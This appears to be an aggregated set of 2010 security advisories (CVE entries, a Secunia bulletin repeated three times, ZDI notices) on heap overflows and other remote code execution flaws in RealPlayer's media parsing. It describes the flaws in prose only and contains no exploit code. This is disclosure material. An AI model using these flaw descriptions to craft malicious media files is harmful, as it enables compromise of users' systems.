Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.5, Mac RealPlayer 11.0 through 12.0.0.1444, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code by specifying many subbands in cook audio codec information in a Real Audio file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious media file.The specific flaw exists in the parsing of audio codec information encapsulated in a Real Audio media file. By specifying a large number of subbands an allocated heap chunk can be overflown. Successful exploitation can result in system compromise under the credentials of the currently logged in user. Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to a heap overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition. This issue affects Windows RealPlayer SP 1.1.5 and prior, Mac RealPlayer 12.0.0.1444 and prior, Linux RealPlayer 11.0.2.1744 and prior. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-272: RealNetworks RealPlayer Cook Audio Codec Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-272 December 10, 2010 -- CVE ID: CVE-2010-4377 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: RealNetworks -- Affected Products: RealNetworks RealPlayer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8454. -- Vendor Response: RealNetworks has issued an update to correct this vulnerability. More details can be found at: http://service.real.com/realplayer/security/12102010_player/en/ -- Disclosure Timeline: 2009-06-25 - Vulnerability reported to vendor 2010-12-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi

Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.1, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code via a large Screen Width value in the Screen Descriptor header of a GIF87a file in an RTSP stream. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious media file.The specific flaw exists in the parsing of GIF87a files over the streaming protocol RTSP. When specifying a large Screen Width size in the Screen Descriptor header a calculation on the destination heap chunks size is improperly checked for overflow. This leads to a smaller buffer being allocated and subsequently a heap overflow when processing the received data. Exploitation of this vulnerability can lead to system compromise under the credentials of the currently logged in user. Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to a heap overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition. This issue affects Windows RealPlayer SP 1.1.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-271: RealNetworks RealPlayer RTSP GIF Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-271 December 10, 2010 -- CVE ID: CVE-2010-4376 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: RealNetworks -- Affected Products: RealNetworks RealPlayer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8308. -- Vendor Response: RealNetworks has issued an update to correct this vulnerability. More details can be found at: http://service.real.com/realplayer/security/12102010_player/en/ -- Disclosure Timeline: 2009-06-25 - Vulnerability reported to vendor 2010-12-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi

Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to execute arbitrary code via malformed multi-rate data in an audio stream. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists when parsing a RealMedia file containing a malformed multi-rate audio stream. The application explicitly trusts two 16-bit values in this data structure which are then used to calculate the size used for an allocation. Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to heap overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition. This issue affects Windows RealPlayer 11.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-266: RealNetworks RealPlayer Multi-Rate Audio Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-266 December 10, 2010 -- CVE ID: CVE-2010-4375 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: RealNetworks -- Affected Products: RealNetworks RealPlayer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8441. -- Vendor Response: RealNetworks has issued an update to correct this vulnerability. More details can be found at: http://service.real.com/realplayer/security/12102010_player/en/ -- Disclosure Timeline: 2009-04-15 - Vulnerability reported to vendor 2010-12-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or 